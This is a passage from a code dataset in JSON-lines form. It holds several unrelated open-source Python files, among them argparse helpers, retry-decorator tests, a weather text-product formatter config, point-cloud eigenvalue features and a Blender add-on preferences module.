\"DTEK50\", \"DTEK60\", \"KEYone\", \"Aurora\", \"Motion\", \"KEY2\", \"KEY2LE\")\n if device is None:\n return None\n else:\n for dev in devices:\n if dev.lower() == device.lower():\n return dev\n raise argparse.ArgumentError(argument=None, message=\"Invalid device.\")\n\n\ndef shortversion():\n \"\"\"\n Get short app version (Git tag).\n \"\"\"\n if not getattr(sys, 'frozen', False):\n ver = bbconstants.VERSION\n else:\n verfile = glob.glob(os.path.join(os.getcwd(), \"version.txt\"))[0]\n with open(verfile) as afile:\n ver = afile.read()\n return ver\n\n\ndef longversion():\n \"\"\"\n Get long app version (Git tag + commits + hash).\n \"\"\"\n if not getattr(sys, 'frozen', False):\n ver = (bbconstants.LONGVERSION, bbconstants.COMMITDATE)\n else:\n verfile = glob.glob(os.path.join(os.getcwd(), \"longversion.txt\"))[0]\n with open(verfile) as afile:\n ver = afile.read().split(\"\\n\")\n return ver\n\n\ndef slim_preamble(appname):\n \"\"\"\n Standard app name header.\n\n :param appname: Name of app.\n :type appname: str\n \"\"\"\n print(\"~~~{0} VERSION {1}~~~\".format(appname.upper(), shortversion()))\n\n\ndef standard_preamble(appname, osversion, softwareversion, radioversion, altsw=None):\n \"\"\"\n Standard app name, OS, radio and software (plus optional radio software) print block.\n\n :param appname: Name of app.\n :type appname: str\n\n :param osversion: OS version, 10.x.y.zzzz. Required.\n :type osversion: str\n\n :param radioversion: Radio version, 10.x.y.zzzz. Can be guessed.\n :type radioversion: str\n\n :param softwareversion: Software release, 10.x.y.zzzz. Can be guessed.\n :type softwareversion: str\n\n :param altsw: Radio software release, if not the same as OS.\n :type altsw: str\n \"\"\"\n slim_preamble(appname)\n print(\"OS VERSION: {0}\".format(osversion))\n print(\"OS SOFTWARE VERSION: {0}\".format(softwareversion))\n print(\"RADIO VERSION: {0}\".format(radioversion))\n if altsw is not None:\n print(\"RADIO SOFTWARE VERSION: {0}\".format(altsw))\n\n\n\ndef default_parser_vers(vers=None):\n \"\"\"\n Prepare version for default parser.\n\n :param vers: Versions: [git commit hash, git commit date]\n :param vers: list(str)\n \"\"\"\n if vers is None:\n vers = longversion()\n return vers\n\n\ndef default_parser_flags(parser, flags=None):\n \"\"\"\n Handle flags for default parser.\n\n :param parser: Parser to modify.\n :type parser: argparse.ArgumentParser\n\n :param flags: Tuple of sections to add.\n :type flags: tuple(str)\n \"\"\"\n if flags is not None:\n parser = dpf_flags_folder(parser, flags)\n parser = dpf_flags_osr(parser, flags)\n return parser\n\n\ndef dpf_flags_folder(parser, flags=None):\n \"\"\"\n Add generic folder flag to parser.\n\n :param parser: Parser to modify.\n :type parser: argparse.ArgumentParser\n\n :param flags: Tuple of sections to add.\n :type flags: tuple(str)\n \"\"\"\n if \"folder\" in flags:\n parser.add_argument(\"-f\",\n \"--folder\",\n dest=\"folder\",\n help=\"Working folder\",\n default=None,\n metavar=\"DIR\",\n type=file_exists)\n return parser\n\n\ndef dpf_flags_osr(parser, flags=None):\n \"\"\"\n Add generic OS/radio/software flags to parser.\n\n :param parser: Parser to modify.\n :type parser: argparse.ArgumentParser\n\n :param flags: Tuple of sections to add.\n :type flags: tuple(str)\n \"\"\"\n if \"osr\" in flags:\n parser.add_argument(\"os\",\n help=\"OS version\")\n parser.add_argument(\"radio\",\n help=\"Radio version, 10.x.y.zzzz\",\n nargs=\"?\",\n default=None)\n parser.add_argument(\"swrelease\",\n help=\"Software version, 10.x.y.zzzz\",\n nargs=\"?\",\n default=None)\n return parser\n\n\ndef default_parser(name=None, desc=None, flags=None, vers=None):\n \"\"\"\n A generic form of argparse's ArgumentParser.\n\n :param name: App name.\n :type name: str\n\n :param desc: App description.\n :type desc: str\n\n :param flags: Tuple of sections to add.\n :type flags: tuple(str)\n\n :param vers: Versions: [git commit hash, git commit date]\n :param vers: list(str)\n \"\"\"\n vers = default_parser_vers(vers)\n homeurl = \"https://github.com/thurask/bbarchivist\"\n parser = argparse.ArgumentParser(prog=name, description=desc, epilog=homeurl)\n parser.add_argument(\"-v\",\n \"--version\",\n action=\"version\",\n version=\"{0} {1} committed {2}\".format(parser.prog, vers[0], vers[1]))\n parser = default_parser_flags(parser, flags)\n return parser\n\n\ndef generic_windows_shim(scriptname, scriptdesc, target, version):\n \"\"\"\n Generic CFP/CAP runner; Windows only.\n\n :param scriptname: Script name, 'bb-something'.\n :type scriptname: str\n\n :param scriptdesc: Script description, i.e. scriptname -h.\n :type scriptdesc: str\n\n :param target: Path to file to execute.\n :type target: str\n\n :param version: Version of target.\n :type version: str\n \"\"\"\n parser = default_parser(scriptname, scriptdesc)\n capver = \"|{0}\".format(version)\n parser = external_version(parser, capver)\n parser.parse_known_args(sys.argv[1:])\n if utilities.is_windows():\n subprocess.call([target] + sys.argv[1:])\n else:\n print(\"Sorry, Windows only.\")\n\n\ndef arg_verify_none(argval, message):\n \"\"\"\n Check if an argument is None, error out if it is.\n\n :param argval: Argument to check.\n :type argval: str\n\n :param message: Error message to print.\n :type message: str\n \"\"\"\n if argval is None:\n raise argparse.ArgumentError(argument=None, message=message)\n\n\ndef external_version(parser, addition):\n \"\"\"\n Modify the version string of argparse.ArgumentParser, adding something.\n\n :param parser: Parser to modify.\n :type parser: argparse.ArgumentParser\n\n :param addition: What to add.\n :type addition: str\n \"\"\"\n verarg = [arg for arg in parser._actions if isinstance(arg, argparse._VersionAction)][0]\n verarg.version = \"{1}{0}\".format(addition, verarg.version)\n return parser\n","repo_name":"thurask/bbarchivist","sub_path":"bbarchivist/argutils.py","file_name":"argutils.py","file_ext":"py","file_size_in_byte":10635,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"83"} +{"seq_id":"34511612672","text":"from logging import getLogger\n\nimport pytest\n\nfrom aspectlib import contrib\nfrom aspectlib.contrib import retry\nfrom aspectlib.test import LogCapture\n\n\ndef flaky_func(arg):\n if arg:\n arg.pop()\n raise OSError('Tough luck!')\n\n\ndef test_done_suceess():\n calls = []\n\n @retry\n def ok_func():\n calls.append(1)\n\n ok_func()\n assert calls == [1]\n\n\ndef test_defaults():\n calls = []\n retry(sleep=calls.append)(flaky_func)([None] * 5)\n assert calls == [0, 0, 0, 0, 0]\n\n\ndef test_raises():\n calls = []\n pytest.raises(OSError, retry(sleep=calls.append)(flaky_func), [None] * 6)\n assert calls == [0, 0, 0, 0, 0]\n\n calls = []\n pytest.raises(OSError, retry(sleep=calls.append, retries=1)(flaky_func), [None, None])\n assert calls == [0]\n\n\ndef test_backoff():\n calls = []\n retry(sleep=calls.append, backoff=1.5)(flaky_func)([None] * 5)\n assert calls == [1.5, 1.5, 1.5, 1.5, 1.5]\n\n\ndef test_backoff_exponential():\n calls = []\n retry(sleep=calls.append, retries=10, backoff=retry.exponential_backoff)(flaky_func)([None] * 10)\n print(calls)\n assert calls == [1, 2, 4, 8, 16, 32, 64, 128, 256, 512]\n\n\ndef test_backoff_straight():\n calls = []\n retry(sleep=calls.append, retries=10, backoff=retry.straight_backoff)(flaky_func)([None] * 10)\n print(calls)\n assert calls == [1, 2, 5, 10, 15, 20, 25, 30, 35, 40]\n\n\ndef test_backoff_flat():\n calls = []\n retry(sleep=calls.append, retries=10, backoff=retry.flat_backoff)(flaky_func)([None] * 10)\n print(calls)\n assert calls == [1, 2, 5, 10, 15, 30, 60, 60, 60, 60]\n\n\ndef test_with_class():\n logger = getLogger(__name__)\n\n class Connection(object):\n count = 0\n\n @retry\n def __init__(self, address):\n self.address = address\n self.__connect()\n\n def __connect(self, *_, **__):\n self.count += 1\n if self.count % 3:\n raise OSError(\"Failed\")\n else:\n logger.info(\"connected!\")\n\n @retry(cleanup=__connect)\n def action(self, arg1, arg2):\n self.count += 1\n if self.count % 3 == 0:\n raise OSError(\"Failed\")\n else:\n logger.info(\"action!\")\n\n def __repr__(self):\n return \"Connection@%s\" % self.count\n\n with LogCapture([logger, contrib.logger]) as logcap:\n try:\n conn = Connection(\"to-something\")\n for i in range(5):\n conn.action(i, i)\n finally:\n for i in logcap.messages:\n print(i)\n assert logcap.messages == [\n ('ERROR', \"__init__((Connection@1, 'to-something'), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.\"),\n ('ERROR', \"__init__((Connection@1, 'to-something'), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.\"),\n ('ERROR', \"__init__((Connection@2, 'to-something'), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.\"),\n ('ERROR', \"__init__((Connection@2, 'to-something'), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.\"),\n ('INFO', 'connected!'),\n ('INFO', 'action!'),\n ('INFO', 'action!'),\n ('ERROR', 'action((Connection@6, 2, 2), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@6, 2, 2), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@7, 2, 2), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@7, 2, 2), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@8, 2, 2), {}) raised exception Failed. 3 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@8, 2, 2), {}) raised exception Failed. 3 retries left. Sleeping 0 secs.'),\n ('INFO', 'connected!'),\n ('INFO', 'action!'),\n ('INFO', 'action!'),\n ('ERROR', 'action((Connection@12, 4, 4), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@12, 4, 4), {}) raised exception Failed. 5 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@13, 4, 4), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@13, 4, 4), {}) raised exception Failed. 4 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@14, 4, 4), {}) raised exception Failed. 3 retries left. Sleeping 0 secs.'),\n ('ERROR', 'action((Connection@14, 4, 4), {}) raised exception Failed. 3 retries left. Sleeping 0 secs.'),\n ('INFO', 'connected!'),\n ('INFO', 'action!'),\n ]\n","repo_name":"ionelmc/python-aspectlib","sub_path":"tests/test_contrib.py","file_name":"test_contrib.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"83"} +{"seq_id":"33950303898","text":"##\n# This software was developed and / or modified by Raytheon Company,\n# pursuant to Contract DG133W-05-CQ-1067 with the US Government.\r\n# \r\n# U.S. EXPORT CONTROLLED TECHNICAL DATA\r\n# This software product contains export-restricted data whose\n# export/transfer/disclosure is restricted by U.S. law. Dissemination\n# to non-U.S. persons whether in the United States or abroad requires\n# an export license or other authorization.\n# \n# Contractor Name: Raytheon Company\r\n# Contractor Address: 6825 Pine Street, Suite 340\r\n# Mail Stop B8\r\n# Omaha, NE 68106\r\n# 402.291.0100\r\n# \r\n# See the AWIPS II Master Rights File (\"Master Rights File.pdf\") for\n# further licensing information.\n##\n########################################################################\n# RDFcst\n#\n########################################################################\n## EXAMPLE OUTPUT:\n##\n## 24 Hour Tabular Forecast for Boulder for 12 AM MST Mar 21 TO 12 PM MST Mar 21.\n##\n## Weather Element 12 AM 3 AM 6 AM 9 AM\n##\n## Temperature 30 28 29\n## Dew Point 25 23 25\n## Wind (mph) NW 4 NW 5 NW 6\n## Sky Cover(%) MOSTLY MOSTLY MOSTLY\n## CLOUDY CLOUDY CLOUDY\n## Rainfall Amount(in.) 0.00 0.00 0.00 0.00\n## Weather RAIN RAIN\n## Snowfall(in.) 0 0 0 0\n##\n## This forecast was generated from a gridded database.\n\n\n# Forecast Definition\nRDFcst = {\n\n ## General Set-Up\n\n \"type\": \"table\",\n \"displayName\": \"RDFcst\", # for Product Generation Menu\n\n # Output file for product results\n \"outputFile\": \"/home/ifp/release/products/TEXT/RDFcst.txt\", # default output file\n \"runTimeOutputFile\": \"no\", # If yes, ask user at run time\n\n # Language\n \"language\": \"english\", # default\n \"runTimeLanguage\": \"no\", # If yes, ask user at run time\n\n # Line Length for resulting Product\n \"lineLength\": 79, # default\n \"runTimeLineLength\": \"no\", # If yes, ask user at run time\n\n # Text to preceed and follow the text product.\n # Remember to add spacing lines backslash n.\n # The variables: %TimePeriod, %EditArea, and %WeatherElement\n # can be included to be filled in with constant variables.\n # For phrase and combo, only %EditArea and %TimePeriod\n # can be filled in.\n \"timePeriodMethod\": \"localTRLabel\", ## localRangeLabel\n \"editAreaLoopBegText\": \"24 Hour Tabular Forecast for %EditArea for %TimePeriod. \\n\\n\",\n \"editAreaLoopEndText\": \"\\n\",\n \"endingText\": \"\\nThis forecast was generated from a gridded database.\\n\\n\\n\",\n\n ## Table Layout\n # A table is a combination of three variables:\n # edit areas, weather elements, and time periods\n # One of these variables is held constant,\n # one is assigned to rows and the other to columns.\n\n \"constantVariable\": \"EditArea\", ## \"TimePeriod\",\n \"rowVariable\": \"WeatherElement\", ## \"EditArea\",\n \"columnVariable\": \"TimePeriod\", ## \"WeatherElement\",\n \"columnJustification\":\"Right\",\n\n ## Edit Areas\n # If the edit area is the constant variable, specify\n # one area and whether to ask user at run time.\n # runTimeEditArea can be a list of areas and/or edit area\n # groups (groups will be expanded into areas) from which\n # the user will be able to choose.\n \"defaultEditAreas\": [\n (\"area1\", \"Area1\"),\n (\"area2\", \"Area2\"),\n (\"area3\", \"Area3\"),\n (\"area4\", \"Area4\")],\n \"runTimeEditAreas\": \"yes\",\n \"areaType\" : \"Edit Area\", # E.g. City, County, Basin, etc.\n\n # Time Ranges\n \"defaultRanges\": [\"Today\"],\n \"runTimeRanges\" : \"no\", # if yes, ask user at run time\n\n ## Weather Elements\n # elementList: List of Weather Element tuples:\n # Weather Element Name\n # Weather Element Label\n # If you want the label to appear on multiple lines,\n # use vertical bars as separators e.g. Maximum|Temperature\n # Analysis method -- Method to produce statistics from the data\n # ReportAs Method -- Method to format the analyzed value(s)\n # DataType: Scalar or Vector or Weather\n # Rounding increment e.g. 5 = round final value to\n # nearest multiple of 5\n # Conversion method\n # e.g. \"mphToKt\" converts from mph to knots\n #\n # If the weather element is the constant variable, only one\n # should be given.\n\n # Name , Label , Analysis Method , ReportAs Method ,\n # DataType , Rounding , Conversion\n\n \"elementList\": [\n (\"T\",\"Temperature\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n (\"Td\",\"Dew Point\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n (\"RH\",\"Relative Humidity(%)\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n (\"WindChill\",\"Wind Chill(F)\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n (\"Wind\",\"Wind (mph)\",\n \"vectorRange\",\n \"avgValue\",\n \"Vector\", 1, \"ktToMph\"),\n (\"Sky\",\"Sky Cover(%)\",\n \"avg\",\n \"cloudCover\",\n \"Scalar\", 5, None),\n (\"QPF\",\"Rainfall Amount(in.)\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", .01, None),\n (\"Wx\",\"Weather \",\n \"dominantWx\",\n \"short_weather_phrase\",\n \"Scalar\", 1, None),\n (\"SnowAmt\",\"Snowfall(in.)\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n (\"PoP\", \"Precip (%)\",\n \"avg\",\n \"singleValue\",\n \"Scalar\", 1, None),\n ],\n\n ## Time Period (If rows or columns vary with TimePeriod\n # timePeriod: This is the interval in hours for sampling the data\n # e.g. every 3 hours.\n # (Can be floating point e.g. 1.5 hour TimePeriods)\n \"timePeriod\": 3,\n # timeSpan: This is the amount of data to sample at each\n # interval.\n # If you want the data analyzed (e.g averaged) over the\n # entire period, the timeSpan should be set to \"timePeriod\".\n # If you only want data for the beginning of each timePeriod,\n # the timeSpan should be set to number of hours over which\n # to analyze the data e.g. 1 hour\n \"timeSpan\": 1,\n \"runTimePeriod\": \"no\", # If yes, ask user at run time for period\n # Method to label periods given a time range\n # periodLabel -- GMT time hourZ/day e.g. 15Z/4\n # localTimeLabel -- local time e.g. 6 AM\n # localRangeLabel -- local time range e.g. 6AM-9AM\n \"periodLabelMethod\": \"localTimeLabel\",\n\n ## User-supplied Methods\n # loopMethod: Method to be called for each row.\n # Such a method might keep ongoing statistics about table data.\n # Arguments: (rowLabel, rowEntries, userDict, argDict)\n # Returns: nothing\n # \"rowEntries\" is a list of (colValue, value) tuples\n # describing the entries in this row.\n # \"userDict\" is a dictionary set up for user-defined\n # callback methods so they can keep ongoing data as\n # the table is being produced.\n # It is not modified by the TextFormatter code.\n \"loopMethod\": None,\n\n # endMethod: Method to be called after table is complete.\n # Arguments: (table, userDict, argDict)\n # Returns: table (could be modified)\n # The table can be modified to report summary statistics\n # gathered in userDict.\n #\n \"endMethod\": None,\n }\n","repo_name":"Unidata/awips2","sub_path":"cave/com.raytheon.viz.gfe/python/testFormatters/RDFcst.py","file_name":"RDFcst.py","file_ext":"py","file_size_in_byte":8337,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"83"} +{"seq_id":"15840376550","text":"#!/usr/bin/env python3\n\"\"\"\nTensor output of the layer\n\"\"\"\nimport tensorflow as tf\n\n\ndef create_layer(prev, n, activation):\n \"\"\"\n Function that return the tensor output of the layer\n \"\"\"\n initial = tf.contrib.layers.variance_scaling_initializer(mode=\"FAN_AVG\")\n layer = tf.layers.Dense(units=n,\n activation=activation,\n kernel_initializer=initial,\n name='layer')\n return layer(prev)\n","repo_name":"Arghost91/holbertonschool-machine_learning","sub_path":"supervised_learning/0x02-tensorflow/1-create_layer.py","file_name":"1-create_layer.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71866642510","text":"#\n# @lc app=leetcode id=647 lang=python3\n#\n# [647] Palindromic Substrings\n#\nfrom lcimports import *\n# @lc code=start\nclass Solution:\n def countSubstrings(self, s: str) -> int:\n def getcount(l, r):\n count = 0\n while l >= 0 and r < len(s) and s[l] == s[r]:\n count += 1\n l -= 1\n r += 1\n return count\n \n count = 1\n for i in range(1, len(s)):\n l1 = getcount(i-1, i)\n l2 = getcount(i, i)\n count += l1 + l2\n return count\n \n# @lc code=end\n\n","repo_name":"architdate/leetcode","sub_path":"647.palindromic-substrings.py","file_name":"647.palindromic-substrings.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"35638155241","text":"import numpy as np\r\n\r\narray_to_find_nbrs = []\r\n\r\ndef get_elements(idx):\r\n if np.shape(array_to_find_nbrs[idx,:])[0] > 100:\r\n rand_int = np.random.choice(np.shape(array_to_find_nbrs[idx,:])[0], 100, replace=False)\r\n return array_to_find_nbrs[idx,:][rand_int,:]\r\n else:\r\n return array_to_find_nbrs[idx,:]\r\n\r\ndef get_covariance(arr):\r\n return np.cov(np.asarray(arr).T)\r\n\r\ndef calc_beta_rad(pvec):\r\n '''\r\n polar angle [0, pi]\r\n '''\r\n return np.arccos(pvec[2]) # arccos:[0, pi]\r\n\r\n\r\ndef calc_gamma_rad(pvec):\r\n '''\r\n azimuth angle [0, 2pi]\r\n '''\r\n gamma = np.arctan2(pvec[1], pvec[0])\r\n if gamma < 0.0:\r\n gamma += 2 * np.pi\r\n return gamma\r\n\r\ndef get_eigen_vals(cov_arr):\r\n cov_arr = np.nan_to_num(cov_arr, copy=True)\r\n ev, evals, ev_trans = np.linalg.svd(cov_arr, compute_uv=True)\r\n zen_angle_0 = calc_beta_rad(ev[:,0])\r\n azi_angle_0 = calc_gamma_rad(ev[:, 0])\r\n zen_angle_1 = calc_beta_rad(ev[:, 1])\r\n azi_angle_1 = calc_gamma_rad(ev[:, 1])\r\n zen_angle_2 = calc_beta_rad(ev[:, 2])\r\n azi_angle_2 = calc_gamma_rad(ev[:, 2])\r\n eval_ratio = evals/np.sum(evals)\r\n\r\n return np.column_stack((eval_ratio[0], eval_ratio[1], eval_ratio[2], zen_angle_0, zen_angle_1 ,zen_angle_2))\r\n\r\ndef get_vectorized_eigen_vals(nbrs, nbr_arr , knn_arr, rad, ratios = True):\r\n \"\"\"\r\n Function to calculate eigen values and vectors for the neighbors within a given radius of all the points in knn_arr\r\n\r\n Parameters\r\n ----------\r\n nbrs: Nearest neigbor classifier\r\n nbr_arr: numpy array\r\n Three-dimensional point cloud of a bigger area to construct the neighborhood data\r\n knn_arr: numpy array\r\n Three-dimensional point cloud of a subset of points from nbr_arr for which the eigen features are calculated\r\n rad: float\r\n Limiting distance of neighbors to return.\r\n\r\n Returns\r\n -------\r\n eval_ratio: arr\r\n Array of size (m x 6) where m is the number of points and first 3 columns refers to 3 eigen values corresponding to x, y and z dimension of\r\n the pointcloud and the next 3 columns are the zenith angle of the 3 eigen vetors\r\n\r\n \"\"\"\r\n\r\n print('Vectorized eigen val')\r\n nbr_idx = nbrs.radius_neighbors(knn_arr, radius=rad, return_distance=False)\r\n global array_to_find_nbrs\r\n array_to_find_nbrs = np.asarray(nbr_arr)\r\n \r\n print('Getting elements from index')\r\n \r\n get_elem_func = np.vectorize(get_elements, otypes=[np.object])\r\n arr_stack = get_elem_func(nbr_idx)\r\n print('Calculating covariance matrix')\r\n \r\n cov_func = np.vectorize(get_covariance, otypes=[np.object])\r\n cov_mat = cov_func(arr_stack)\r\n \r\n print('Calculating eigen values of the covariance matrix')\r\n \r\n eval_fun = np.vectorize(get_eigen_vals, otypes=[np.object])\r\n eval_ratio = eval_fun(cov_mat)\r\n #print(eval_ratio)\r\n return np.row_stack((eval_ratio))\r\n","repo_name":"sruthimoorthy/leaf_wood_clf","sub_path":"eigen_val_and_vec_features.py","file_name":"eigen_val_and_vec_features.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"83"} +{"seq_id":"29958120623","text":"import glob\nimport os.path\nimport numpy as np\nimport pandas as pd\nfrom pandas import DataFrame\nfrom collections import OrderedDict\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nimport javalang\nfrom pathlib import Path\n\nclass Parser:\n \"\"\"Class containing parsers\"\"\"\n \n __slots__ = ['name']\n \n def __init__(self, name):\n self.name = name\n\n \n def src_vectorizer(self):\n \"\"\"Parse source code directory of a program and collect\n its java files.\n \"\"\"\n \n parse_tree = None\n \n file = open(self.name,'r')\n #print(file.read())\n print('-----------------------------------------------------')\n vectorizer = CountVectorizer()\n # Looping to parse each source file\n \n for x in range (1):\n \n src = file.read()\n print(src)\n \n \n # Placeholder for different parts of a source file\n comments = ''\n class_names = []\n attributes = []\n method_names = []\n variables = []\n\n # Source parsing\n \n try:\n parse_tree = javalang.parse.parse(src)\n for path, node in parse_tree.filter(javalang.tree.VariableDeclarator):\n if isinstance(path[-2], javalang.tree.FieldDeclaration):\n attributes.append(node.name)\n elif isinstance(path[-2], javalang.tree.VariableDeclaration):\n variables.append(node.name)\n except:\n pass\n \n # Trimming the source file\n ind = False\n if parse_tree:\n if parse_tree.imports:\n last_imp_path = parse_tree.imports[-1].path\n src = src[src.index(last_imp_path) + len(last_imp_path) + 1:]\n elif parse_tree.package:\n package_name = parse_tree.package.name\n src = src[src.index(package_name) + len(package_name) + 1:]\n else: # There is no import and no package declaration\n ind = True\n # javalang can't parse the source file\n else:\n ind = True\n \n # create the transform\n vectorizer = TfidfVectorizer()\n # tokenize and build vocab\n vectorizer.fit([str(parse_tree)])\n # summarize\n print('---------------------------check 2----------------------------------')\n print(vectorizer.vocabulary_)\n vector = vectorizer.transform([str(parse_tree)])\n print(vector)\n print('---------------------check 3-------------------------------------------------------------')\n a=np.array(vector.toarray())\n print(a)\n print('---------------------check 4-------------------------------------------------------------')\n df = DataFrame(a)\n print(df)\n df.to_csv(r'godclasstextualdata.csv',mode='a',header=False)\n\n \n \n\nif __name__ == '__main__':\n parser = Parser('')\n\n srcfilesnames = pd.read_csv('allnames.csv')\n names= srcfilesnames.iloc[0:len(srcfilesnames),0]\n names=np.array(names)\n print(names)\n foundsrc=0\n notdound=0\n for i in range(names.shape[0]):\n try:\n fh = open(names[i]+\".java\", 'r')\n foundsrc=foundsrc+1\n parser = Parser(names[i]+'.java')\n parser.src_vectorizer()\n print(\"found\")\n except FileNotFoundError:\n notdound=notdound+1\n missingarray=(['notfound'])\n df = DataFrame(missingarray)\n df.to_csv(r'godclasstextualdata.csv',mode='a',header=False)\n print(\"notfound\")\n\n\n print(\"f \",foundsrc)\n print(\"notfound \",notdound) \n print(names)\n \n\n\n \n \n\n \n","repo_name":"Mostafa-Eltazy/Code-Smell-Detection","sub_path":"Code/Textual Feature Extraction.py","file_name":"Textual Feature Extraction.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"83"} +{"seq_id":"40383624443","text":"import bpy\nfrom . VGU_Pie import *\nimport rna_keymap_ui\nfrom . import utility_function\n\n\nIcon_Expose_Style = [(\"OLD\",\"Legacy\",\"Legacy\"),(\"PANEL\",\"Icon Panel\",\"Icon Panel\")]\n\n\nENUM_Tabs = [(\"PANELS\", \"Panels\", \"Panels\"), (\"KEYMAPS\",\"Keymaps\",\"Keymaps\")]\n\n\ndef append_panel_class(panels, cls, category, label):\n\n panel = cls \n item = [panel, category, label]\n panels.append(item)\n\n return panels\n\n\ndef update_panel(self, context):\n\n addon_preferences = utility_function.get_addon_preferences(context)\n \n message = \": Updating Panel locations has failed\"\n\n panels = []\n\n from . import VGU_UI_Panel \n\n panel_cls = VGU_UI_Panel.VGU_PT_Vertex_Group_List_DATA\n category = addon_preferences.Vertex_Group_List_Category\n label = addon_preferences.Vertex_Group_List_Label\n\n item = [panel_cls, category, label]\n panels.append(item)\n\n\n panel_cls = VGU_UI_Panel.VGU_PT_Vertex_Group_List_SIDE\n category = addon_preferences.Vertex_Group_List_Category\n label = addon_preferences.Vertex_Group_List_Label\n\n item = [panel_cls, category, label]\n panels.append(item)\n\n\n panel_cls = VGU_UI_Panel.VGU_PT_Vertex_Group_Tools\n category = addon_preferences.Vertex_Group_Tools_Category\n label = addon_preferences.Vertex_Group_Tools_Label\n\n item = [panel_cls, category, label]\n panels.append(item)\n\n\n\n\n try:\n pass\n for item in panels:\n\n panel = item[0]\n category = item[1]\n label = item[2]\n \n if \"bl_rna\" in panel.__dict__:\n bpy.utils.unregister_class(panel)\n\n\n panel.bl_category = category\n panel.bl_label = label\n bpy.utils.register_class(panel)\n\n except Exception as e:\n print(\"\\n[{}]\\n{}\\n\\nError:\\n{}\".format(__name__, message, e))\n pass\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass VGU_user_preferences(bpy.types.AddonPreferences):\n bl_idname = __package__\n\n\n TABS_Preferences: bpy.props.EnumProperty(items=ENUM_Tabs)\n\n\n Side_Panel: bpy.props.BoolProperty(default=True)\n Object_Data_Panel: bpy.props.BoolProperty(default=True)\n\n SoloIcon : bpy.props.BoolProperty(default=True)\n VisibilityIcon : bpy.props.BoolProperty(default=True)\n SelectionIcon : bpy.props.BoolProperty(default=True)\n SeperateIcon : bpy.props.BoolProperty(default=True)\n AssignIcon : bpy.props.BoolProperty(default=True)\n UnassignIcon : bpy.props.BoolProperty(default=True)\n RemoveIcon : bpy.props.BoolProperty(default=True)\n AddModifierIcon : bpy.props.BoolProperty(default=False)\n LockWeightIcon : bpy.props.BoolProperty(default=False)\n SetPivotIcon : bpy.props.BoolProperty(default=False)\n LockAllButThis: bpy.props.BoolProperty(default=False)\n\n Icon_Expose_Style : bpy.props.EnumProperty(items=Icon_Expose_Style, default=\"PANEL\")\n Show_Icon_Expose_Panel : bpy.props.BoolProperty(default=False)\n\n \n Vertex_Group_List_Category: bpy.props.StringProperty(default=\"Vertex Group Utils\", update=update_panel)\n Vertex_Group_List_Label: bpy.props.StringProperty(default=\"Vertex Group List\", update=update_panel)\n\n Vertex_Group_Tools_Category: bpy.props.StringProperty(default=\"Vertex Group Utils\", update=update_panel)\n Vertex_Group_Tools_Label: bpy.props.StringProperty(default=\"Vertex Group Tools\", update=update_panel)\n\n\n Vertex_Group_List_Side_Panel: bpy.props.BoolProperty(default=True)\n Vertex_Group_List_Data_Panel: bpy.props.BoolProperty(default=True)\n Vertex_Group_Tools: bpy.props.BoolProperty(default=True)\n\n\n\n def draw(self, context):\n\n\n\n layout = self.layout\n\n col = layout.column(align=True)\n row = col.row(align=True)\n row.prop(self, \"TABS_Preferences\", expand=True)\n\n box = col.box()\n\n if self.TABS_Preferences == \"PANELS\":\n self.draw_panel_options(context, box)\n\n if self.TABS_Preferences == \"KEYMAPS\":\n self.draw_keymaps(context, box)\n\n def draw_panel_options(self, context, layout):\n\n\n # layout.prop(self, \"Side_Panel\", text=\"Display Side Panel\")\n # layout.prop(self, \"Object_Data_Panel\", text=\"Display Object Data Panel\")\n\n layout.label(text=\"Vertex Group List\")\n row = layout.row()\n row.prop(self, \"Vertex_Group_List_Side_Panel\", text=\"Side Panel\")\n row.prop(self, \"Vertex_Group_List_Data_Panel\", text=\"Object Data Properties Panel\")\n\n if any([self.Vertex_Group_List_Side_Panel, self.Vertex_Group_List_Data_Panel]):\n\n layout.prop(self, \"Vertex_Group_List_Category\", text=\"Category\")\n layout.prop(self, \"Vertex_Group_List_Label\", text=\"Label\")\n\n\n\n\n layout.label(text=\"Vertex Group Tools\")\n layout.prop(self, \"Vertex_Group_Tools\", text=\"Side Panel\")\n if self.Vertex_Group_Tools:\n layout.prop(self, \"Vertex_Group_Tools_Category\", text=\"Category\")\n layout.prop(self, \"Vertex_Group_Tools_Label\", text=\"Label\")\n\n layout.separator()\n\n def 